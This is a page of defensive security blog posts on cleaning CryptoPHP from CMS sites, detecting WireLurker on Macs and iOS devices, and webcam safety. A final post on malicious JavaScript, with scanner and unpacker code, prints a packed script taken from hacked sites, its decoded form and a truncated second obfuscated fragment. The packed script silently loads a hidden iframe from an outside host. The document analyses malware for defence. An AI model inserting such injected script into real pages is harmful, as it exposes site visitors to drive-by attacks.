Showing posts with label malicious codes. Show all posts

26/11/2014

How to Clear/Remove CryptoPHP PHP Deadly Malware



What is CryptoPHP
CryptoPHP is a dangerous threat named by Fox-IT’s security research team, who first detected it in 2013. According to them, the threat uses backdoored themes and plug-ins for CMS (content management system) platforms to attack web servers. This works because many web administrators today build their websites on a CMS rather than on raw HTML. Popular CMSs like WordPress, Joomla and Drupal are under attack because site owners install pirated themes and plug-ins on their websites. Once you have installed one of these backdoored themes or plug-ins, the attackers can control the malware manually or via command-and-control (C2) and email communications. From there onwards they use your website for illegal search engine optimization, known as Blackhat SEO.
CryptoPHP carries several hardcoded domains for command-and-control communications and uses RSA encryption to protect its communications with the C2 servers. Some versions also have a backup ability to communicate over email if the C2 domains are taken down. The CryptoPHP malware can update itself, inject content into the compromised sites it sits on and perform several other functions. Fox-IT has a very in-depth whitepaper available. Operators of CryptoPHP currently abuse the backdoor for illegal search engine optimization, also known as Blackhat SEO. The backdoor is a well-developed piece of code and dynamic in its use. The capabilities of the CryptoPHP backdoor include:
*. Integration into popular content management systems like WordPress, Drupal and Joomla.
*. Public key encryption for communication between the compromised server and the command and control (C2) server.
*. An extensive infrastructure in terms of C2 domains and IP’s.
*. Backup mechanisms in place against C2 domain takedowns in the form of email communication.
*. Manual control of the backdoor besides the C2 communication.
*. Remote updating of the list of C2 servers.
*. Ability to update itself.
Over the last few days Abuseat/CBL have added this to their database, and they are now blocking server IPs that host the CryptoPHP malware.

How to Detect and Clean CryptoPHP PHP Malware
It seems the attacker injects the malware using a file named social.png. Here is a simple command that finds all such files and prints up to 80 characters following the string php from each one, just to confirm its content:
find /home/ -name "social*.png" -exec grep -E -o 'php.{0,80}' {} \; -print
You need to delete those files and examine the affected user account, because just deleting the file will not actually solve anything. You can also run the following command.
find -L /home -type f -name '*.png' -print0 | xargs -0 file | grep "PHP script" > /root/crypto.txt
This checks all png files; you can expand it to check all jpg and gif files as well. The output file will contain a list of files that are actually PHP scripts. I’d also suggest running a maldet or clamav scan on your server to find the CryptoPHP malware. Make sure to update both clamav and maldet before scanning.
freshclam
maldet -u
Also submit an IP removal request to CBL.
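The two find commands above catch PHP stored under a .png name either by grepping for the tag or by asking file(1) to type the content. The Python scanner below is an added example, not code from this post: it does both checks in one pass over a directory tree, comparing each image file’s leading bytes with the magic bytes its extension implies and searching the body for a PHP open tag, so it also flags polyglot files that carry a genuine image header with PHP appended (which the file-type check alone misses). The file names and contents written by build_sample_dir are constructed for the demonstration; point scan_dir at /home to run it on a real host.

```python
import os
import re
import tempfile
from collections import namedtuple

# Leading bytes ("magic") expected for the image types the post's commands cover.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# PHP open tag plus up to 80 bytes of context, like the post's grep -o 'php.{0,80}'.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)(.{0,80})", re.DOTALL)

Finding = namedtuple("Finding", "path reason snippet")


def inspect_file(path):
    """Return a Finding when an image file is not what its extension claims, else None."""
    ext = os.path.splitext(path)[1].lower()
    if ext not in MAGIC:
        return None
    with open(path, "rb") as fh:
        data = fh.read()
    header_ok = any(data.startswith(m) for m in MAGIC[ext])
    tag = PHP_TAG.search(data)
    if tag and not header_ok:
        # Plain PHP script stored under an image name (the social.png case).
        return Finding(path, "php-script-with-image-extension", tag.group(0)[:80])
    if tag and header_ok:
        # Valid image header followed by PHP: a polyglot that `file` reports as an image.
        return Finding(path, "polyglot-image-with-php", tag.group(0)[:80])
    if not header_ok:
        return Finding(path, "bad-magic-bytes", data[:16])
    return None


def scan_dir(root):
    """Walk root and collect every suspicious image file."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            finding = inspect_file(os.path.join(dirpath, name))
            if finding:
                findings.append(finding)
    return findings


def build_sample_dir():
    """Write constructed sample files (not real malware) to a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="cryptophp-demo-")
    samples = {
        "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 64,                 # benign image
        "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,                 # benign image
        "social.png": b"<?php echo 'constructed sample, not CryptoPHP'; ?>",
        "banner.gif": b"GIF89a" + b"\x00" * 32 + b"<?php /* constructed polyglot */ ?>",
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(content)
    return root


def scan_sample():
    """Run the scanner over the constructed samples; map file name -> reason."""
    return {os.path.basename(f.path): f.reason for f in scan_dir(build_sample_dir())}


if __name__ == "__main__":
    for f in scan_dir(build_sample_dir()):
        print(f"{f.reason:34} {f.path}  {f.snippet!r}")
```

Files reported as bad-magic-bytes without a PHP tag are worth a manual look too: they are not images either, even if they are not PHP.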
Important Tips:
*. Do not install web templates/themes from unknown websites.
*. Before installing, scan the whole package with well-known online scanners such as VirusTotal, Metascan Online and so on.
*. If you are a web developer, open every file and look for unknown code or character sequences. If you find any, remove them so the backdoor’s author loses their foothold.

21/11/2014

How To Detect And Remove WireLurker Malware From iPhone, iPad



What is WireLurker?
The WireLurker malware, known to infect OS X powered Macs and iOS devices has stirred up the Apple community. Malware that successfully infects Apple products is rare. On the Mac that was because criminals tended to go after the much bigger Windows market, while on the iPhone and iPad, Apple's App Store security has been exemplary. Known to exist as a threat in China

How do I detect WireLurker?

The WireLurker malware installs a number of files on your OS X system, which set it up to detect any iOS systems you attach by a USB cable, and then install malware into that iOS device. If you have any of these files on your Mac, then you likely have the malware installed. These have been outlined by Palo Alto Networks, the company that discovered the malware, and for the current variant of the malware include the following files:
1. A file called run.sh in the Macintosh HD > Users > Shared folder
2. Any of the following files in the Macintosh HD > Library > Launch Daemons folder
com.apple.machook_damon.plist
com.apple.globalupdate.plist
3. Any of the following files in the Macintosh HD > System > Library > Launch Daemons folder
com.apple.appstore.plughelper.plist
com.apple.MailServiceAgentHelper.plist
com.apple.systemkeychain-helper.plist
4. In addition, the following files and folders will be in the hidden usr/bin directory, which can be opened by pressing Shift-Command-G in the Finder and then entering “/usr/bin” in the path field that shows up:
globalupdate
/usr/local/machook/
WatchProc
itunesupdate
com.apple.MailServiceAgentHelper
If you see any or all of these files in your Mac’s hard drive, then your Mac has likely been compromised.
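As an added example (not code from this post or from Palo Alto Networks), the Python script below checks the indicator paths listed above from a terminal instead of through the Finder, and for every launch daemon plist it finds it reads the ProgramArguments entry so you can see which binary the persistence item starts. The folders the Finder shows as “Launch Daemons” are named LaunchDaemons on disk. build_sample_root writes a constructed fake infection into a temporary directory purely so the checker can be exercised offline; the plist contents there are made up.

```python
import os
import plistlib
import sys
import tempfile

# Indicator paths from the post, relative to the system root.
WIRELURKER_PATHS = [
    "Users/Shared/run.sh",
    "Library/LaunchDaemons/com.apple.machook_damon.plist",
    "Library/LaunchDaemons/com.apple.globalupdate.plist",
    "System/Library/LaunchDaemons/com.apple.appstore.plughelper.plist",
    "System/Library/LaunchDaemons/com.apple.MailServiceAgentHelper.plist",
    "System/Library/LaunchDaemons/com.apple.systemkeychain-helper.plist",
    "usr/bin/globalupdate",
    "usr/local/machook",
    "usr/bin/WatchProc",
    "usr/bin/itunesupdate",
    "usr/bin/com.apple.MailServiceAgentHelper",
]


def launchd_program(plist_path):
    """Return the executable a launchd job file starts (or a marker if unreadable)."""
    try:
        with open(plist_path, "rb") as fh:
            job = plistlib.load(fh)
    except Exception:
        return "<unparseable plist>"
    args = job.get("ProgramArguments")
    return args[0] if args else job.get("Program")


def check_indicators(root="/"):
    """Map each indicator present under root to the program it launches (None for plain files)."""
    hits = {}
    for rel in WIRELURKER_PATHS:
        full = os.path.join(root, rel)
        if os.path.exists(full):
            hits[rel] = launchd_program(full) if full.endswith(".plist") else None
    return hits


def build_sample_root(infected=True):
    """Constructed demo tree (not a real infection) so the checker can run offline."""
    root = tempfile.mkdtemp(prefix="wirelurker-demo-")
    if infected:
        os.makedirs(os.path.join(root, "Users/Shared"))
        with open(os.path.join(root, "Users/Shared/run.sh"), "w") as fh:
            fh.write("#!/bin/sh\n# constructed placeholder, not WireLurker\n")
        os.makedirs(os.path.join(root, "Library/LaunchDaemons"))
        job = {  # made-up job contents for the demo
            "Label": "com.apple.globalupdate",
            "ProgramArguments": ["/usr/bin/globalupdate"],
            "RunAtLoad": True,
        }
        plist = os.path.join(root, "Library/LaunchDaemons/com.apple.globalupdate.plist")
        with open(plist, "wb") as fh:
            plistlib.dump(job, fh)
        os.makedirs(os.path.join(root, "usr/bin"))
        open(os.path.join(root, "usr/bin/globalupdate"), "w").close()
        os.makedirs(os.path.join(root, "usr/local/machook"))
    return root


if __name__ == "__main__":
    # Pass a root to inspect; with no argument the constructed demo tree is used.
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_root()
    found = check_indicators(target)
    if not found:
        print("no WireLurker indicators under", target)
    for rel, program in found.items():
        print(f"FOUND {rel}" + (f"  (starts {program})" if program else ""))
```

Run it as root with "/" as the argument on the Mac you want to check; the same checker works against a mounted disk image of another Mac by passing the mount point instead.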

How to protect against WireLurker?
The first step Mac users can take to protect themselves is to not download or run any applications that come from third-party app stores. Go to OS X's System Preferences, click "Security and Privacy," and then select "Allow apps downloaded from Mac App Store (or Mac App Store and identified developers)." This will prevent the Mac from installing any software not authorized by Apple. Next, install a decent OS X antivirus application. Some of the best ones are free, so you have nothing to lose. Be sure to keep all the software on all your iOS and OS X devices up to date; Apple is quite responsive about patching vulnerabilities. Never connect your iPhone to an unknown or untrusted computer, whether it's a Mac or a PC, or even to an untrusted charger; chargers can actually be mini-computers.

How do I remove WireLurker?
Fortunately, WireLurker appears to be easy to remove. All you have to do is delete the related files from the affected Macs or iOS devices.
For Jailbroken Users
Step 1: Install a File manager such as iFile or Filza. You could also use SSH capabilities to gain access to your iDevice from your Mac or PC.
Step 2: Navigate to > Library > MobileSubstrate > DynamicLibraries.
Step 3: Here, look for a file named sfbase.dylib and if found, you know your device is infected. However, if no such file exists, breathe a sigh of relief. Normally one would perceive deleting this file as a removal of the threat that WireLurker is, but it is recommended that you do a complete restore of your iOS device from iTunes.
For Non-Jailbroken Users
Although there’s no way you can be infected by WireLurker at this point, since Apple has put appropriate security measures in place, there’s a possibility that you picked up the malware a while back, before the Cupertino giant took action. If you believe you’re infected and your device is not jailbroken, read on.
Step 1: Open the Settings app and go to General > Profile.
Step 2: Check for any anomalous profile and if you find one delete it.
Step 3: Check all installed apps for strange behavior, and delete all strange or suspicious ones that you find installed. Again, it is highly recommended that you do a complete restore of your iOS device from iTunes until a more effective and surefire solution comes up.

Webcam Safety Tips: Are You Being Watched Through Your Webcam?


Webcam Safety Tips

A few clicks of the mouse, and your webcam is activated and ready to be used. But have you considered the possibility that someone else could be watching you through your own webcam?
Well, strictly speaking, if your computer is secure and uninfected, can’t be accessed remotely, has a strong password and a locked case, and is tied up with string to prevent people from accessing it when unattended, then no worries, you’re good.

How Webcams Get Hacked
Hackers utilize a type of software called Remote access tool (RAT) that allows them to remotely access a computer as if they were physically there. Though RATs were designed for legal purposes, like allowing a technician to remotely access a user’s computer to troubleshoot problems without having to physically be there, hackers exploit this software for their own benefit.
Typically, a hacker lures an unsuspecting user into clicking on a link, opening a picture or email attachment, visiting a specific website, or downloading some software. After the user falls for one of these, the RAT software is secretly installed onto the user’s computer. The hacker now has remote access to the user’s computer.

Preventing Your Webcam from Being Hacked
Many articles recommend covering the lens of the webcam with a piece of paper to prevent hackers from spying on you. But doing that alone is brushing the real problem under a rug. Having your webcam hacked means your PC has been compromised by some malware, and you need to take immediate action to get rid of it. Here are some easy things you can do that can prevent your computer from being compromised in the first place.

Don’t Click on Unknown Links
Hackers lure victims into installing RAT software onto their PC by disguising links, pictures, or email attachments as something desirable, such as free music, movies, or desktop wallpapers. Be wary of suspicious websites that offer similar items. Also be cautious about clicking on shortened links you may find on social media sites.

Equip your computer with an antivirus and two-way firewall
Having an antivirus and a two-way firewall is the minimum security any PC should be equipped with. An up-to-date and active antivirus helps detect malware and remove it before it infects your computer. A two-way firewall monitors inbound and outbound traffic to and from your computer.

Be cautious of tech support offering remote assistance
Hackers may contact you directly, by phone, claiming there are problems with your computer. They’ll try to persuade you to install a program that gives them remote access to your computer so that they can fix the problem. Simply ignore calls from those who claim they are tech support.

Secure your wireless connection
A hacker can easily hack into unsecure Wi-Fi networks with a laptop, antenna, and widely available software. Don’t make it easy for them. Secure your wireless connection with a strong and complex password.

Disable Windows Remote Access
Though most RATs deployed by malware are custom tools, disabling Windows Remote Assistance and Remote Desktop is one thing you can do to prevent hackers from remotely accessing your computer.

25/10/2014

Examples of Malicious JavaScript

If the hackers are using script to hack your site it will be obfuscated to try and hide what the script is doing. This type of hack can be inserted in individual html/php pages on a site or into one of the javascript files. The bottom line is, if you see blocks of obfuscated script in one of your files be suspicious, check to make sure you know exactly what the script is doing. In the vast majority of hacks the obfuscated script is going to write either an iframe or a script call into the pages of the site. The [src="http://some.malicious.site/malicious.php"] will be a URL that loads the malicious content into the page.
Now a few examples of code I have seen on hacked sites.
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai|showthread|php|72241732'.split('|'),0,{}))</script>
Which de-obfuscates to ->
function MakeFrameEx(){
    element = document.getElementById('yahoo_api');
    if (!element){
        var el = document.createElement('iframe');
        document.body.appendChild(el);
        el.id = 'yahoo_api';
        el.style.width = '1px';
        el.style.height = '1px';
        el.style.display = 'none';
        el.src = 'hxxp://juyfdjhdjdgh.nl.ai/showthread.php?t=72241732'
    }
}
var ua = navigator.userAgent.toLowerCase();
if (((ua.indexOf("msie") != -1 && ua.indexOf("opera") == -1 && ua.indexOf("webtv") == -1)) && ua.indexOf("windows") != -1){
    var t = setTimeout("MakeFrameEx()", 1000)
}
<script>date=new Date();var ar="Jp}g3ra]A\"kmTdQh{,'=Dyi)cf>1(0o[F
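The sample above is wrapped in Dean Edwards’ “p.a.c.k.e.r”; the eval(function(p,a,c,k,e,d){...}) header is its fingerprint. Rather than loading the script in a browser to see what it does, an analyst can reverse the packing statically: every word token in the payload is a base-a number whose value indexes the '|'-separated dictionary, and empty dictionary slots mean the token is literal. The Python below is an added example, not code from this post; it re-implements that decoding, runs it over the post’s packed sample (embedded as PACKED_SAMPLE with the extraction artefacts removed) and then pulls out any src= assignment, which is where the injected iframe’s URL appears. is_packed is the fingerprint check to run over a site’s files before unpacking anything.

```python
import re

# Fingerprint of the p.a.c.k.e.r wrapper (older builds name the last parameter d, newer ones r).
PACKER_SIGNATURE = re.compile(r"eval\(function\(p,a,c,k,e,[dr]\)")

# The trailing call: ('payload', radix, count, 'w0|w1|...'.split('|'), 0, {})
PACKER_ARGS = re.compile(
    r"\('(?P<p>(?:\\.|[^'\\])*)',(?P<a>\d+),(?P<c>\d+),'(?P<k>[^']*)'\.split\('\|'\)"
)

# A src= assignment or attribute: where the injected iframe/script URL shows up.
SRC_ASSIGN = re.compile(r"""(?:\.src\s*=\s*|\bsrc=)['"]([^'"]+)['"]""")

# The post's packed sample, with the zero-width spaces and the "g&t;" for ">" removed.
PACKED_SAMPLE = (
    r"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))"
    r"+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String))"
    r"{while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};"
    r"while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}"
    r"('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';"
    r"0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("
    r'"p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}'
    r"',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|"
    r"display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|"
    r"toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai|"
    r"showthread|php|72241732'.split('|'),0,{}))"
)


def is_packed(text):
    """True if the text carries the p.a.c.k.e.r eval wrapper."""
    return PACKER_SIGNATURE.search(text) is not None


def _digit(ch):
    # The packer's encoder emits 0-9, then a-z, then A-Z for values above 35.
    if "0" <= ch <= "9":
        return ord(ch) - ord("0")
    if "a" <= ch <= "z":
        return ord(ch) - ord("a") + 10
    if "A" <= ch <= "Z":
        return ord(ch) - ord("A") + 36
    raise ValueError(ch)


def decode_index(token, radix):
    """Inverse of the packer's e() function: encoded token -> dictionary index."""
    value = 0
    for ch in token:
        value = value * radix + _digit(ch)
    return value


def unpack(packed):
    """Statically reverse one p.a.c.k.e.r layer without evaluating any script."""
    m = PACKER_ARGS.search(packed)
    if m is None:
        raise ValueError("no p.a.c.k.e.r call found")
    payload = re.sub(r"\\(.)", r"\1", m.group("p"))  # drop the JS string escapes
    radix, count = int(m.group("a")), int(m.group("c"))
    words = m.group("k").split("|")

    def expand(match):
        token = match.group(0)
        try:
            idx = decode_index(token, radix)
        except ValueError:  # not an encoded token (e.g. contains '_')
            return token
        if idx < count and idx < len(words) and words[idx]:
            return words[idx]
        return token  # empty dictionary slot: the token stands for itself

    return re.sub(r"\b\w+\b", expand, payload)


def find_injected_sources(js):
    """Collect src= URLs from (unpacked) script text."""
    return SRC_ASSIGN.findall(js)


if __name__ == "__main__":
    code = unpack(PACKED_SAMPLE)
    print(code)
    print("loads:", find_injected_sources(code))
```

Samples in the wild are often packed several times; loop unpack while is_packed stays true. The output of the sample matches the de-obfuscated listing in the post.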
Always follow up with some basic security checks. Figuring out how the rats are getting into the barn is always tough. Most hosting services will help by checking access logs, looking at file ownership etc. so ask your hosting service for any information they can provide.